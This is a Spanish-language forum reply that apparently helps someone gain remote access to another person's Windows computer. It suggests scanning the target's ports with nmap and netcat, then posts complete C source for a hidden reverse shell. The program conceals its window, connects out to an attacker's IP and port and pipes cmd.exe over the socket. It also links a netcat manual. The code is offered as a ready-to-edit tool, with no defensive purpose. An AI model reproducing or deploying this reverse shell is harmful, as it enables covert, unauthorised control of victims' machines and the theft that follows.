Como te dijeron arribaCreo que podrías trabajar con un shell remoto, usando
netcat nmap, viendo sus puertos y escanearlos, para esto necesitarías su
ipAcá tenés un exploit para
Windows, lo encontré en un posteo de
Kasswed hace más de 10 años, tal vez siga funcionado (no estoy muy adentrado en el tema)
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32")
int main(int argc, char *argv[])
{
ShowWindow(GetForegroundWindow(),SW_HIDE);
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in addr;
memset(&addr,0,sizeof(addr));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
addr.sin_family = AF_INET;
addr.sin_port = htons(PUERTO); //Atencion a esta linea, aki va el
puerto de conexion NetCat
addr.sin_addr.s_addr = inet_addr("AKI TU IP O DOMINIO
NO-IP");//Atencion a esta linea, aki va tu IP
connect(hSocket,(struct sockaddr*)&addr,sizeof(addr));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
ExitProcess(0);
}
Al parecer, este código se procesa en el puerto donde puedas escuchar y usar la conexión (eso ya es método tuyo, leé el link que te dejo abajo si querés saber más) , y gracias a este código, podrías hacer una conexión remotamente y no física. Fijate que el archivo hay que editarlo, leelo bien
Si quieres saber más, acá tenes el link
http://foro.elhacker.net/tutoriales_documentacion/manual_de_netcat-t87109.0.htmlEspero haberte ayudado, suerte pibe, y contame como te fue